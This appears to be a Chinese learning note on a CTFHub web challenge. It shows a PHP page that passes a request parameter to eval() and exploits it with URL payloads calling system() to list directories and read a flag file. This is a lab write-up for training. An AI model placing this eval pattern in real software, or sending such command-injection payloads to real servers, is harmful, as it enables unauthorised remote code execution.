CTFHub 技能树 Web RCE eval执行(学习记录)

eval执行

源代码

php 复制代码
<?php
if (isset($_REQUEST['cmd'])) {
    eval($_REQUEST["cmd"]);
} else {
    highlight_file(__FILE__);
}
?>

PHP代码显示,要求将命令赋值给cmd然后执行

先查看一下根目录文件 /?cmd=system("ls");

查看上一级目录找flag文件

/?cmd=system("ls /");

打开flag文件发现FLAG

/?cmd=system("cat /flag_9237");

linux在读取flag的时候可以使用*去匹配

cat /flag*

/?cmd=system("cat /flag*");

相关推荐
你有我备注吗4 分钟前
SQL学习之查询
java·sql·学习
从零开始的代码生活_7 分钟前
C++ stack、queue 与 priority_queue:容器适配器原理与实战
开发语言·c++·后端·学习·算法
铅笔侠_小龙虾13 分钟前
Rust 学习(6)-所有权规则、移动语义、Clone 与 Copy
python·学习·rust
kiss strong22 分钟前
AI学习-langchain
学习·langchain
灵性(๑>ڡ<)☆1 小时前
Java学习笔记--面向对象高级(多态)
笔记·学习
AA陈超2 小时前
003 XiYou 西游 — P0 阶段实施计划
c++·笔记·学习·ue5
其实防守也摸鱼2 小时前
运维--安全与数据库
网络·数据库·学习·安全·安全威胁分析·数据库架构·软件安全
pop_xiaoli2 小时前
【iOS】YYModel源码学习
学习·ios·objective-c·cocoa
嵌入式-老费3 小时前
esp32开发与应用(利用loopback学习can)
学习
xianrenli384 小时前
DS5900作业之“氛围(Vibe)”背后的伦理
学习·ai编程·msai